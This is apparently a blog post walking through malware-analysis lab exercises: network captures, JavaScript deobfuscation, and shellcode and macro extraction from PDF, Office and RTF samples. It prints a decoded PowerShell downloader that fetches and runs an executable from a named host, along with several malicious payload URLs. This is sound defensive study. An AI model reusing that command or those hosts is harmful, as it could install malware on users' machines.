DEV Community

Khalif AL Mahmud

A Deep Dive into Malware Analysis: Deobfuscation, Shellcode Extraction, and Document Forensics

When most people think about malware analysis, they picture someone staring at assembly code for hours. And sure, that's part of it. But the reality is far more varied — and honestly, more interesting. A huge chunk of real-world malware analysis work happens at a layer above disassembly: extracting obfuscated scripts from documents, carving shellcode out of PDFs, reconstructing attack chains from network captures, and understanding how adversaries abuse everyday file formats like Word docs and Excel spreadsheets to deliver payloads.

I recently spent some serious hands-on time working through a range of malware samples across different formats — from compromised website traffic and obfuscated JavaScript to malicious PDFs, RTFs, and Office documents. The goal wasn't just to run tools blindly, but to understand the why behind each technique: why attackers choose certain obfuscation methods, why specific file formats are attractive delivery vehicles, and how analysts can peel back the layers to expose the underlying behavior.

This article walks through that entire journey — the tools, the commands, the thought process, and what I learned along the way.


The Problem Statement

Modern malware delivery is rarely a single executable anymore. Attackers have moved toward:

  • Compromised websites serving malicious scripts and exploit kits
  • Obfuscated JavaScript that hides payload delivery mechanisms
  • Malicious PDFs embedding JavaScript and shellcode
  • Office documents (.doc, .docm, .xlsx) with macros or embedded OLE objects
  • RTF files with embedded shellcode or exploit objects

Each of these presents a unique analysis challenge. The common thread? Everything is obfuscated, layered, and designed to evade static detection. As an analyst, your job is to strip away those layers without executing the malware in a live environment.

This article covers a full analysis pipeline across 15 exercises, organized into logical categories: network traffic analysis, script deobfuscation, PDF forensics, Office document analysis, and shellcode extraction.


Part 1: Analyzing Network Traffic to Reconstruct an Attack

The first part of the analysis starts with network artifacts. When a victim visits a compromised website, a lot happens behind the scenes — redirects, script injections, exploit kit delivery, and eventually payload retrieval. Capturing and analyzing that traffic is often the best way to understand the full infection chain.

Setting Up the Lab Environment

For this analysis, I used two virtual machines:

  • Windows REM Workstation — for Windows-based tools like Fiddler, Wireshark, and scdbg
  • REMnux — a Linux distro purpose-built for malware analysis

All samples were extracted to the appropriate directories on both systems before starting analysis.

Analyzing Traffic with Fiddler

Fiddler is a fantastic tool for inspecting HTTP/HTTPS traffic at the application layer. I loaded a saved session archive (session-fiddler.saz) to inspect the traffic from a compromised site.

# On Windows REM Workstation - open session-fiddler.saz in Fiddler
# (Double-click the file or use File > Load Archive)

Finding the compromise: The first request to www.hiltongardeninnoakville.com returned a 200 OK response. Decoding the response body revealed an injected script at the bottom of the page referencing my.GEORGETHORPEBOURBON.COM — a clear indicator of a compromised site serving malicious content.

Following the chain: The first request to my.georgethorpebourbon.com returned heavily obfuscated JavaScript. The next response began with "CWS", the signature of a zlib-compressed Flash (SWF) file. Further down, two requests for /default.jpg from 195.154.122.33 returned the word "default" instead of an actual image. Notably, these requests were made by a process named 963e.tmp rather than by the browser (iexplore.exe), suggesting the exploit had already triggered and dropped a payload.
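
Spotting a response by its leading bytes, as with "CWS" above, is easy to script. The following is a minimal sketch, not part of the original workflow; the signature table and the sample bodies are illustrative assumptions rather than bytes from the capture.

```python
# Magic-byte prefixes for formats that commonly show up in this kind of traffic.
SIGNATURES = {
    b"CWS": "Flash (SWF, zlib-compressed)",
    b"FWS": "Flash (SWF, uncompressed)",
    b"ZWS": "Flash (SWF, LZMA-compressed)",
    b"MZ": "Windows executable (DOS/PE header)",
    b"%PDF": "PDF document",
}


def sniff(body: bytes) -> str:
    """Return a label for the first matching signature, else 'unknown'."""
    for magic, label in SIGNATURES.items():
        if body.startswith(magic):
            return label
    return "unknown"


# Hypothetical response bodies, not data from session.pcap.
print(sniff(b"CWS\x0b\x00\x00\x00\x00"))
print(sniff(b"default"))
```

A body that claims to be an image but sniffs as "unknown" plain text, like the /default.jpg responses, is worth a closer look.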

Deep-Diving with Wireshark

For packet-level inspection, I loaded the same traffic in Wireshark (session.pcap).

# Display filter to isolate traffic from the suspicious IP
ip.addr == 195.154.122.33

The most interesting finding was the last HTTP POST request to /setting/get_setting.php. The request body contained two notable parameters:

  • key: possibly key material exchanged with the server, which would be consistent with ransomware behavior
  • idn: likely a unique identifier for the infected system, which an operator could use to match a victim to a ransom payment and decryption key
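
To pull parameters like these out of a POST body programmatically, a form-encoded body can be parsed with the standard library. This is a small sketch that assumes the body is application/x-www-form-urlencoded; the values shown are placeholders, not the ones from the capture.

```python
from urllib.parse import parse_qs


def parse_post_body(body: str) -> dict:
    """Parse a form-encoded body into {name: first value}."""
    return {name: values[0] for name, values in parse_qs(body).items()}


# Placeholder values; the real request's values are not reproduced here.
sample_body = "key=EXAMPLEKEY&idn=0123456789abcdef"
fields = parse_post_body(sample_body)
print(fields["key"], fields["idn"])
```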

Extracting Files with CapTipper

CapTipper is a REMnux tool that automates file extraction from PCAP files — incredibly useful for pulling out payloads that were transferred during the attack.

# On REMnux
cd /opt/remnux-captipper
mkdir /tmp/out
./CapTipper.py -g -d /tmp/out ~/malware/day3/session.pcap

# List extracted files
ls /tmp/out

# Identify the Flash program
file /tmp/out/* | grep Flash

# The suspicious Flash file was found at: /tmp/out/70-index.php

CapTipper successfully carved out the Flash payload from the network traffic, which could then be analyzed further with tools like swfdump.
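
Before a carved CWS file can be inspected as plain bytes, its body has to be inflated. The sketch below shows the idea under the standard SWF layout (3-byte signature, 1-byte version, 4-byte little-endian length, then a zlib stream); it runs on a synthetic file, and the function name is my own.

```python
import struct
import zlib


def inflate_swf(data: bytes) -> bytes:
    """Convert a zlib-compressed SWF (CWS) into an uncompressed one (FWS)."""
    if data[:3] == b"FWS":
        return data  # already uncompressed
    if data[:3] != b"CWS":
        raise ValueError("not a zlib-compressed SWF")
    # Bytes 3..7 hold the version and the uncompressed length; keep them as-is.
    body = zlib.decompress(data[8:])
    return b"FWS" + data[3:8] + body


# Round-trip demo on a synthetic file (not the sample carved by CapTipper).
payload = b"\x00" * 32
header = bytes([10]) + struct.pack("<I", 8 + len(payload))
cws = b"CWS" + header + zlib.compress(payload)
fws = inflate_swf(cws)
print(fws[:3], len(fws))
```

In practice the input would be read from the carved file, for example /tmp/out/70-index.php.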


Part 2: Deobfuscating JavaScript — Three Different Approaches

JavaScript deobfuscation is a core skill for any malware analyst. I worked through three different scripts, each requiring a different technique.

Technique 1: Using the Internet Explorer Debugger

The file session.html contained obfuscated JavaScript that ultimately loaded a Flash exploit. The approach here was elegant in its simplicity: use the browser's own debugger to let the script do the deobfuscation work for you.

Step 1 — Beautify and inspect the script:

# Open session.html in Notepad++
# Plugins > JSTool > JSMin (remove extraneous components)
# Plugins > JSTool > JSFormat (reformat for readability)

After beautifying, I identified a function l that implemented the deobfuscation algorithm, ending with return r;. This was the perfect breakpoint location.

Step 2 — Revert and insert debugger statement:

// Revert to original, then add debugger; at the start of the second <script> tag:
<script>debugger;if /*sidgfdfdf81669kdfl*/((/*sidgf73056dfdfkdfl*/gffsd/*sidgfdfdfd40511fkdfl*/))/*xY2YtOTZi52952OC00NDQ*/{
    function ...

Step 3 — Debug in Internet Explorer:

  1. Open the modified session.html in IE
  2. Press F12 to open Developer Tools → Debugger tab
  3. Reload the page and click "Allow blocked content"
  4. The debugger pauses at the debugger; statement
  5. Search for return r, right-click, and insert a breakpoint
  6. Click Continue (Play button) to let the script run to the breakpoint
  7. Switch to Console tab and type:
console.group(r)

The console displayed the fully deobfuscated script, which revealed an <object> tag loading a Flash program via clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 (the class ID of the Flash Player ActiveX control), consistent with the Flash file seen in the Part 1 traffic.

Technique 2: Using SpiderMonkey for Headless Deobfuscation

For fgg.js, the obfuscation relied on location.href — something that only exists in a real browser context. SpiderMonkey is a JavaScript engine that runs scripts without a browser, but we need to provide the missing objects.

# First attempt — fails because 'location' is not defined
js -f fgg.js
# Error: "location is not defined"

# Second attempt — provide default object definitions
js -f /usr/share/remnux/objects.js -f fgg.js
# Runs but output is unreadable — wrong location.href value

# Fix: Copy and modify objects.js to set the correct URL
cp /usr/share/remnux/objects.js .
# Edit objects.js:
location = {
    href:"http://www.gitporg.com/cgi-bin/index.cgi?fgg"
}

# Execute with the corrected location
js -f objects.js -f fgg.js > fgg2.js
scite fgg2.js &

The deobfuscated fgg2.js revealed a malicious URL we hadn't seen before — demonstrating how providing the right environmental context can unlock hidden behavior in obfuscated scripts.

Technique 3: Using box-js for Environment Emulation

For contact_vcf.wsf, both SpiderMonkey and manual analysis fell short. This is where box-js shines — it's a full JavaScript environment emulator designed specifically for malware analysis.

# SpiderMonkey attempt — incomplete deobfuscation
js -f /usr/share/remnux/objects.js -f contact_vcf.wsf | more
# Error: "_87867t67t6gt is not defined"

# box-js — much more comprehensive
box-js contact_vcf.wsf | more

box-js not only deobfuscated the script but also created a contact_vcf.wsf.results directory with detailed analysis artifacts:

# Check extracted URLs
more contact_vcf.wsf.results/urls.json
# Found: http://sapanboon.com/ne7ptotr

# Examine downloaded files
file contact_vcf.wsf.results/* | more

# Analyze the PE executable that was downloaded
peframe contact_vcf.wsf.results/795* | more
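
For triage across several samples, the URLs that box-js records can be grouped by host. This sketch assumes urls.json is a flat JSON array of URL strings, which is how I understand box-js writes it; the helper name is hypothetical.

```python
import json
from urllib.parse import urlparse


def group_by_host(urls_json: str) -> dict:
    """Group the URLs in a box-js style urls.json document by hostname."""
    hosts = {}
    for url in json.loads(urls_json):
        hosts.setdefault(urlparse(url).hostname, []).append(url)
    return hosts


# Inline stand-in for the file contents, using the URL reported above.
sample = '["http://sapanboon.com/ne7ptotr"]'
print(group_by_host(sample))
```

To run it on real output, pass in the text of contact_vcf.wsf.results/urls.json instead of the inline sample.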

Part 3: PDF Forensics — Extracting Embedded Threats

PDFs are a classic malware delivery vector. They can embed JavaScript, launch external programs, and hide shellcode in encoded streams. I analyzed several malicious PDFs using a systematic approach.

Analyzing ctk.pdf — Base64-Encoded PowerShell

The file ctk.pdf had an OpenAction dictionary designed to auto-launch a PowerShell command when the document opened. The argument passed to -EncodedCommand was clearly Base64-encoded.

# Examine the PDF structure
scite ctk.pdf &

# Decode manually using base64 utility
base64 -d
# Paste the encoded string, press Enter, then Ctrl+D

# Output:
# PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command
# (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/awori.exe',
# $env:APPDATA\awori.exe); Start-Process ($env:APPDATA\awori.exe)

For a more automated approach:

# Identify all Base64 strings in the PDF
base64dump.py ctk.pdf

# Extract and decode the largest one (ID: 2)
base64dump.py ctk.pdf -s 2 -S

The decoded command was a classic downloader — grab an executable from a remote server, save it locally, and execute it.
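
The same decoding can be done in a few lines of Python. PowerShell's -EncodedCommand expects Base64 over UTF-16LE text, so the sketch below decodes with that assumption; the command it round-trips is a harmless stand-in, not the string from ctk.pdf.

```python
import base64


def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE text)."""
    return base64.b64decode(b64).decode("utf-16-le")


# Build a benign example instead of reproducing the sample's payload.
command = "Write-Output 'hello'"
encoded = base64.b64encode(command.encode("utf-16-le")).decode("ascii")
print(decode_encoded_command(encoded))
```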

Analyzing collab.pdf — JavaScript, Shellcode, and Exploits

This was a more complex PDF with multiple layers of obfuscation.

Step 1 — Initial assessment with pdfid.py:

pdfid.py collab.pdf
# Reports: /JavaScript present — high risk indicator

Step 2 — Locate JavaScript objects:

pdf-parser.py collab.pdf --search JavaScript | more
# Found objects: 1 0, 7 0, 12 0 (references to 10 0 and 13 0)

Step 3 — Extract and decode the stream:

pdf-parser.py collab.pdf --object 10
pdf-parser.py collab.pdf --object 13

# Save decoded stream from object 13
pdf-parser.py collab.pdf --object 13 --filter --raw -d collab.txt
scite collab.txt &

Step 4 — Fix and deobfuscate the JavaScript:
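The script obtained its decoding function through a misleading expression built on JavaScript's comma operator. Each parenthesized list evaluates to its last item, so the expression reduces to "lktc"["eval"]: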

hyltlzyr=("kasg","vfys","zsjj","qtkj","zfch","tmxf","eits","ydcy","huzl","xovi","bhpe","lktc")[("rirh","msas","qxsf","mkva","xdax","goib","hsie","lzem","nkls","eval")];

This was just a convoluted way of setting hyltlzyr = eval. I simplified it:

hyltlzyr=eval;

Then ran it through SpiderMonkey:

js -f /usr/share/remnux/objects.js -f collab.txt > collab2.txt
scite collab2.txt &

Step 5 — Extract the shellcode:
The deobfuscated script contained a Unicode-encoded shellcode string. I used base64dump.py with the percent-Unicode (-e pu) encoding option:

# Locate the encoded shellcode
base64dump.py -e pu collab2.txt

# Extract and save the binary shellcode (ID: 1)
base64dump.py -e pu collab2.txt -s 1 -d > collab-out.bin
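
To make the percent-Unicode conversion less of a black box, here is a rough Python equivalent. It assumes each %uXXXX unit becomes two bytes with the low byte first, which is how such strings end up in memory after unescape(); the sample string is made up.

```python
import re
import struct


def decode_percent_u(text: str) -> bytes:
    """Convert %uXXXX sequences to bytes, low byte first."""
    words = re.findall(r"%u([0-9a-fA-F]{4})", text)
    return b"".join(struct.pack("<H", int(word, 16)) for word in words)


# Made-up input: two NOP words followed by one more 16-bit unit.
sample = "%u9090%u9090%u41eb"
print(decode_percent_u(sample).hex())
```

Backslash-Unicode strings (\uXXXX) can be handled the same way by changing the prefix in the regular expression.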

Step 6 — Emulate shellcode execution with scdbg:

# On Windows REM Workstation with scdbg:
# Load collab-out.bin, keep default settings, click Launch

The scdbg output revealed the shellcode calling URLDownloadToFileA to fetch an executable from 94.247.2.157, saving it as %Temp%\wJQs.exe, then launching it via WinExec.

Analyzing page.pdf — From Shellcode to Executable

The page.pdf file used XFA forms to embed JavaScript and shellcode — a technique commonly seen in exploit kits.

Step 1 — Initial scan:

pdfid.py page.pdf
peepdf.py -fl page.pdf
# Reports: AcroForm in object 3, XFA in object 2

Step 2 — Trace object references:

pdf-parser.py page.pdf --object 3  # Refers to object 2
pdf-parser.py page.pdf --object 2  # Refers to object 1
pdf-parser.py page.pdf --object 1  # Contains the stream

Step 3 — Extract and decode:

pdf-parser.py page.pdf --object 1 --filter --raw -d page.txt
scite page.txt &

The stream contained an XFA form with JavaScript defining a shellcode variable using \u Unicode encoding.

Step 4 — Extract shellcode:

# Locate backslash-Unicode encoded strings
base64dump.py page.txt -e bu

# Examine the largest string (ID: 3) — starts with \u9090 (NOP sled)
base64dump.py page.txt -e bu -s 3 -a | more

# Save as binary
base64dump.py page.txt -e bu -s 3 -d > page-out.bin

Step 5 — Convert shellcode to executable:

shellcode2exe.py page-out.bin
# Creates: page-out.exe

Step 6 — Behavioral confirmation with INetSim:
I transferred page-out.exe to the Windows VM and executed it while running fakedns and INetSim on REMnux to simulate internet services. The executable immediately tried to connect out — confirming downloader behavior. Process Hacker showed a.exe running on the desktop (the default binary INetSim serves).

# On REMnux — terminal 1
fakedns

# On REMnux — terminal 2
inetsim

# The shellcode attempted to download from: http://www.exploitmaze.com/01akin.exe

Part 4: Microsoft Office Document Analysis

Office documents with malicious macros remain one of the most common initial access vectors. I analyzed several document types, each presenting different challenges.

media.docm — Downloader Macro

# Extract macros with olevba.py
olevba.py media.docm | more

The macro used MSXML2.XMLHTTP to download http://softtonic.biz/cr/20014.exe and saved it to %AppData%\q\q.com, then executed it. Classic downloader behavior.

# Extract the .docm internals (the file is a ZIP archive)
unzip media.docm -d media

# Examine the embedded image
feh media/word/media/image2.jpg &

# Find URLs in the VBA project (ASCII first, then 16-bit little-endian strings)
strings media/word/vbaProject.bin | grep http
strings --encoding=l media/word/vbaProject.bin | grep http
# Found: softtonic.biz AND dropboxusercontent.com (interesting secondary URL)

# Examine macro streams
oledump.py media/word/vbaProject.bin
oledump.py -s 3 -v media/word/vbaProject.bin | more
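
The two strings invocations matter because VBA projects can store text both as ASCII and as UTF-16LE. A rough Python equivalent of that search is sketched below; the function name and the test data are my own, with reserved example hostnames standing in for the real URLs.

```python
import re

ASCII_URL = re.compile(rb"https?://[\x21-\x7e]+")
# In UTF-16LE, every printable ASCII character is followed by a NUL byte.
UTF16_URL = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+"
)


def find_urls(data: bytes) -> set:
    """Find http(s) URLs stored as ASCII or as UTF-16LE text."""
    urls = {m.group().decode("ascii") for m in ASCII_URL.finditer(data)}
    urls |= {m.group().decode("utf-16-le") for m in UTF16_URL.finditer(data)}
    return urls


# Synthetic buffer; the hostnames are placeholders, not the sample's URLs.
blob = (
    b"\x01\x02http://a.example/x.exe\x00\xff"
    + "http://b.example/y".encode("utf-16-le")
    + b"\x00\x00"
)
print(sorted(find_urls(blob)))
```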

message.docm — Dropper with Hex-Embedded Executable

This one was more sophisticated — the macro didn't download anything. Instead, it extracted an executable that was already embedded inside the document.

olevba.py message.docm | more

The macro iterated through every paragraph in the document, extracting hexadecimal characters, converting them to binary, and saving the result as %UserProfile%\BrhotakdNdVMM.exe.

# Extract and examine the document contents
unzip message.docm -d message
scite message/word/document.xml &

The document.xml contained hidden hexadecimal values formatted as white text (color FFFFFF) on a white background: invisible to the victim, but parseable by the macro.

# Use the provided extraction script
python message_extract.py message.docm extracted.exe
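
The internals of message_extract.py are not shown here, so the following is only my own sketch of the general idea: collect the text runs in document.xml that consist purely of hex digits and convert them to bytes. The XML snippet is synthetic and the real macro may select paragraphs differently.

```python
import re

TEXT_RUN = re.compile(r"<w:t(?:\s[^>]*)?>([^<]*)</w:t>")
HEX_ONLY = re.compile(r"(?:[0-9A-Fa-f]{2})+")


def hex_payload_from_xml(xml: str) -> bytes:
    """Concatenate hex-only <w:t> text runs and convert them to bytes."""
    runs = (run.strip() for run in TEXT_RUN.findall(xml))
    return bytes.fromhex("".join(r for r in runs if HEX_ONLY.fullmatch(r)))


# Synthetic stand-in for word/document.xml: one visible run, two hidden hex runs.
sample_xml = (
    "<w:p><w:r><w:t>Please enable content</w:t></w:r></w:p>"
    '<w:p><w:r><w:rPr><w:color w:val="FFFFFF"/></w:rPr>'
    "<w:t>4D5A9000</w:t></w:r></w:p>"
    '<w:p><w:r><w:t xml:space="preserve">03000000</w:t></w:r></w:p>'
)
print(hex_payload_from_xml(sample_xml)[:2])
```

A result that starts with the bytes MZ is a quick sign that the hidden text really is a Windows executable.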

invoice.doc — XOR-Obfuscated Macro

The invoice.doc macro used a two-layer decoding scheme: Hextostring followed by XORI, which XORed two strings together. The macro also had heavy junk code with endless GoTo statements and randomly-named labels.

# Extract the macro
oledump.py invoice.doc
oledump.py invoice.doc -s 7 -v > invoice.txt
scite invoice.txt &

Despite the obfuscation, I could spot method names: Open, Send, responseBody — all indicating HTTP download behavior.

Manual XOR decoding with xor-kpa.py:

xor-kpa.py -x '#h#2B07372B185D480C222A1C3B3204' '#h#66546F'
xor-kpa.py -x '#h#122F20' '#h#556A74'
xor-kpa.py -x '#h#152D2404270A0924' '#h#634F42'
xor-kpa.py -x '#h#29240416204F3B3C111625021B38081522' '#h#7A4C61'
xor-kpa.py -x '#h#391F2913' '#h#6D5A6443716F69'
xor-kpa.py -x '#h#2406210B022E063F0B173F0C5F2A2D1D' '#h#7854714F55'
xor-kpa.py -x '#h#123E070240655C1B173A1600132B1F17142F0115036410135520005D18231D5C1F3216' '#h#7A4A7372'
xor-kpa.py -x '#h#1D1C3F19' '#h#495972'
xor-kpa.py -x '#h#39081E31141237140A37041C4B3F3610' '#h#655A4E754344'

Decoded results revealed: MSXML2.XMLHTTP, GET, Shell.Application, TEMP, and the download URL: http://imperialenergy.ca/js/bin.exe.
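
The decoding itself is a repeating-key XOR, which is easy to reproduce outside xor-kpa.py. The sketch below reuses hex pairs from the commands above (without the #h# prefix) and assumes the key simply repeats when it is shorter than the ciphertext; the function name is my own.

```python
from itertools import cycle


def xor_hex(cipher_hex: str, key_hex: str) -> str:
    """XOR two hex strings, repeating the key as needed, and return the text."""
    cipher = bytes.fromhex(cipher_hex)
    key = bytes.fromhex(key_hex)
    return bytes(c ^ k for c, k in zip(cipher, cycle(key))).decode("latin-1")


pairs = [
    ("2B07372B185D480C222A1C3B3204", "66546F"),
    ("122F20", "556A74"),
    ("391F2913", "6D5A6443716F69"),
]
for cipher_hex, key_hex in pairs:
    print(xor_hex(cipher_hex, key_hex))
```

Because the key is stored right next to each ciphertext, this layer adds friction for signature matching rather than real secrecy.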

Automated extraction with oledump.py plugin:

oledump.py invoice.doc -p plugin_http_heuristics
# Automatically extracted: http://imperialenergy.ca/js/bin.exe

poc.doc — P-Code Macros

This was a fascinating edge case. The document contained no extractable macro source code — only compiled p-code.

# olevba.py finds nothing
olevba.py poc.doc

# oledump.py lists streams but no 'M' markers
oledump.py poc.doc

# But stream 7 contains suspicious binary content
oledump.py poc.doc -s 7 | more

# Extract and disassemble the p-code
pcodedmp.py -d poc.doc | more

The p-code disassembly revealed two ArgsCall instructions: one displaying a message box ("This could have been a virus!") and another using Shell to execute calc.exe — a classic proof-of-concept demonstrating that p-code can execute even when no source code is present.


Part 5: RTF Document Analysis and Shellcode Extraction

RTF files are another popular delivery format because they can embed objects and obfuscate content through excessive nesting.

payment.doc — Deeply Nested RTF with Embedded Shellcode

# Count the number of {} groups — abnormally high count suggests obfuscation
rtfdump.py payment.doc | wc -l
# Output: ~23,000 lines

# List only groups containing objects
rtfdump.py payment.doc -f O

Group 166 stood out: Level 5 nesting, 1,194,787 bytes, with 11,417 hex characters.

# Examine the suspicious group
rtfdump.py payment.doc -s 166 | more

# Convert hex to bytes and examine
rtfdump.py payment.doc -s 166 -H > payment-out2.txt
scite payment-out2.txt &

Scrolling through the hex dump in SciTE, I spotted the telltale signs: a \x90\x90\x90\x90 NOP sled at offset 0xBA0, followed by assembly instructions, and strings like LoadLibraryA, URLDownloadToFileA, WinExec, plus the URL http://rtnlogistics.com/nestom22.exe at offset 0xCB0.

Carving the shellcode:

rtfdump.py payment.doc -s 166 -H -c 0xBA0:0xCE0 -d > payment-out.bin
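
Finding the sled and cutting out the byte range can also be scripted when the offsets are not obvious by eye. This is a minimal sketch on a synthetic buffer; the helper names, the filler bytes, and the placeholder URL are assumptions, and the slice follows Python's start-inclusive, end-exclusive convention.

```python
def find_nop_sled(data: bytes, min_len: int = 4) -> int:
    """Return the offset of the first run of at least min_len 0x90 bytes, or -1."""
    return data.find(b"\x90" * min_len)


def carve(data: bytes, start: int, end: int) -> bytes:
    """Return the bytes from start (inclusive) to end (exclusive)."""
    return data[start:end]


# Synthetic buffer standing in for the decoded RTF group (not the real sample).
url = b"http://example.invalid/a.exe\x00"
blob = b"\x00" * 0x20 + b"\x90" * 8 + b"\xeb\x10" + url + b"\x00" * 0x10
start = find_nop_sled(blob)
end = blob.index(url) + len(url)
shellcode = carve(blob, start, end)
print(hex(start), len(shellcode))
```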

After transferring to Windows and emulating in scdbg, the shellcode confirmed its behavior: downloading from rtnlogistics.com, saving as word.scr, and executing via WinExec.

qa.doc — RTF Dropper with jmp2it Dynamic Analysis

The qa.doc file was more complex — the shellcode didn't just download a payload, it actually created a fake WINWORD.EXE file and embedded a multi-stage dropper inside it.

# Locate the suspicious group
rtfdump.py qa.doc
# Group 5: large size, high nesting level

# Extract the binary content
rtfdump.py qa.doc -s 5 -H -d > qa-out.bin

Finding shellcode patterns with XORSearch:

xorsearch -W -d 3 qa-out.bin
# Results:
# GetEIP pattern at 0x3B (cleartext, XOR key 0)
# Similar pattern at 0x5D (XOR key F3)

The GetEIP pattern at 0x3B indicated the likely shellcode entry point.
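
To show what this kind of search is doing, here is a simplified sketch that brute-forces single-byte XOR keys and looks for one common GetEIP idiom: call $+5 followed by pop of a 32-bit register. XORSearch's built-in wildcard rules cover more patterns and encodings, and this may not be the rule that fired on qa-out.bin; the buffer below is synthetic, laid out to mirror the offsets reported above.

```python
import re

# call $+5 (E8 00 00 00 00) followed by pop r32 (opcodes 58..5F).
GETEIP = re.compile(rb"\xe8\x00\x00\x00\x00[\x58-\x5f]")


def find_geteip(data: bytes):
    """Yield (xor_key, offset) for each match under every 1-byte XOR key."""
    for key in range(256):
        table = bytes(b ^ key for b in range(256))
        for match in GETEIP.finditer(data.translate(table)):
            yield key, match.start()


# Synthetic buffer: a cleartext pattern at 0x3B, an XOR-0xF3 copy at 0x5D.
pattern = b"\xe8\x00\x00\x00\x00\x5b"
encoded = bytes(b ^ 0xF3 for b in pattern)
blob = b"\xcc" * 0x3B + pattern + b"\xcc" * 28 + encoded + b"\xcc" * 4
hits = list(find_geteip(blob))
print([(hex(key), hex(offset)) for key, offset in hits])
```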

Emulating in scdbg with proper context:

# On Windows REM Workstation with scdbg:
# - Enable "Start Offset" and enter: 3B
# - Enable "fopen" checkbox and point to qa.doc
# - Click Launch

The shellcode called GetFileSize (returning 357ab hex = 219,051 bytes — the exact size of qa.doc), created C:\Program Files (x86)\Microsoft Office, and made ReadFile/WriteFile calls to generate WINWORD.EXE.

Live execution with jmp2it:

# On Windows Command Prompt:
jmp2it qa-out.bin 0x3B addhandle qa.doc

After 30-60 seconds, I checked C:\Program Files (x86)\Microsoft Office and found the newly created WINWORD.EXE. Extracting it with 7-Zip revealed three files:

  • 1.vbs — launches test.bat in a hidden window
  • test.bat — runs start comres.exe -p123qwe
  • comres.exe — a password-protected self-extracting archive containing comres.dll

The endgame: the DLL gets dropped into %SystemRoot% (C:\Windows), where a separate attack component can load it.


Part 6: Excel with Embedded JavaScript and Certificate Injection

The sbb.xlsx file was an unusual case: it contained a JavaScript file embedded inside an OLE2 object, designed to manipulate browser proxy settings and install a fake SSL certificate.

# List streams
oledump.py sbb.xlsx
# Found: oleObject1.bin with large stream A3 (27,162 bytes)

# Get info about the stream
oledump.py sbb.xlsx -s A3 -i
# Filename: sbb_ch_29.29.2929.js (what Excel saves to %Temp%)

# Extract the JavaScript
oledump.py sbb.xlsx -s A3 -d > sbb-out.js

After cleaning non-JavaScript text from the file (removing header/footer garbage), I deobfuscated it:

# Run through SpiderMonkey
js -f /usr/share/remnux/objects.js -f sbb-out.js > sbb-out2.js

# The output references reverse(), so try reversing every line (rev works line by line)
rev sbb-out2.js > sbb-out3.txt
scite sbb-out3.txt &

The reversed strings revealed alarming capabilities:

  • taskkill /F /im chrome.exe, firefox.exe, iexplore.exe
  • Registry manipulation: AutoConfigURL, AutoDetect (browser proxy settings)
  • PowerShell execution with -ExecutionPolicy Unrestricted
  • IP detection via api.ipify.org and icanhazip.com
  • Connection to an onion.link URL (a web gateway to Tor hidden services)
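
The reversal step is simple enough to reproduce in Python when rev is not available. The sketch below reverses each line independently, as rev does; the two sample lines are reversed forms of strings from the list above, written out by hand for illustration.

```python
def reverse_lines(text: str) -> str:
    """Reverse each line independently, like the rev utility."""
    return "\n".join(line[::-1] for line in text.splitlines())


# Hand-made input: reversed forms of two strings listed above.
sample = "exe.emorhc mi/ F/ llikksat\nLRUgifnoCotuA"
print(reverse_lines(sample))
```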

Deeper analysis with box-js:

box-js sbb-out.js --no-shell-error --no-file-exists > sbb-out4.txt
scite sbb-out4.txt &

box-js emulated the script's full behavior and saved artifacts in sbb-out.js.results/. The resources.json showed the script generating cert.der files in %Temp%. Converting with OpenSSL:

openssl x509 -in 56a9* -inform der -text -noout | more
# Result: A fake certificate claiming to be from "COMODO Certification Authority"

The full picture: this script kills browsers, installs a fake CA certificate, redirects traffic through an attacker-controlled server reached over Tor by way of the proxy auto-config (AutoConfigURL) setting, and uses the victim's public IP as a parameter in the callback URL.


How to Verify Your Analysis

Throughout this process, I used several validation techniques to confirm findings:

| Verification Method | When to Use | Expected Confirmation |
|---|---|---|
| scdbg emulation | After extracting shellcode | API call sequence matches hypothesis (e.g., URLDownloadToFileA → WinExec) |
| INetSim + fakedns | For downloaders | Process attempts HTTP/HTTPS connection, receives default binary |
| Process Hacker | Live execution on Windows | New process spawned with expected name and parent relationship |
| File command | After carving binaries | Output matches expected type (PE, Flash, etc.) |
| peframe | PE files post-extraction | Suspicious APIs (network, process creation) present in import table |
| 7-Zip extraction | Self-extracting archives | Internal structure reveals staging components (batch files, DLLs) |
| Hash verification | Cross-referencing samples | Same file hash across different extraction methods confirms consistency |
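
For the hash check in the last row, a few lines of Python are enough to compare payloads obtained by different routes. This is a generic sketch with hypothetical helper names; SHA-256 is my choice here, and any strong hash would serve.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of data as a hex string."""
    return hashlib.sha256(data).hexdigest()


def same_payload(*blobs: bytes) -> bool:
    """True when every blob hashes to the same SHA-256 digest."""
    return len({sha256_hex(blob) for blob in blobs}) == 1


# Stand-in data; in practice these would be the bytes of each extracted file.
print(same_payload(b"carved via tool A", b"carved via tool A"))
print(same_payload(b"carved via tool A", b"carved via tool B"))
```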

What I Learned

This deep dive reinforced several important lessons:

1. Layered obfuscation is the norm, not the exception. Every single sample used multiple layers: hex encoding, XOR, reversed strings, comma-operator tricks, junk code, excessive nesting. Attackers know analysts are looking, so they add friction at every step.

2. Context matters for deobfuscation. The fgg.js script wouldn't deobfuscate correctly until location.href was set to the exact URL it expected. Environmental awareness — understanding what objects and values a script relies on — is critical.

3. The right tool for the right job. SpiderMonkey worked for some scripts, but box-js was necessary for others. pdfid.py gives a quick risk assessment, but pdf-parser.py does the heavy lifting. scdbg is great for emulation, but jmp2it reveals behavior that emulation might miss.

4. Network artifacts tell the full story. Even the most obfuscated document ultimately needs to communicate. Traffic analysis (Fiddler, Wireshark, CapTipper) often provides the clearest view of the attacker's end goal.

5. P-code is a real threat. The poc.doc exercise showed that documents can execute malicious macros even when no source code is extractable. Tools like pcodedmp.py fill a critical gap that traditional macro extractors can't handle.

6. Certificate attacks are sophisticated. The sbb.xlsx sample demonstrated a multi-stage attack involving fake CA certificates, browser proxy hijacking, and Tor-concealed command-and-control, a level of sophistication that goes well beyond simple downloaders.


Common Mistakes to Avoid

| Mistake | Why It Happens | How to Avoid |
|---|---|---|
| Forgetting to revert beautified scripts before debugging | Beautification can break execution | Always work from the original, insert your debugger;, then save |
| Wrong location.href in objects.js | Copy-pasting without checking | Verify the URL matches where the script was originally hosted |
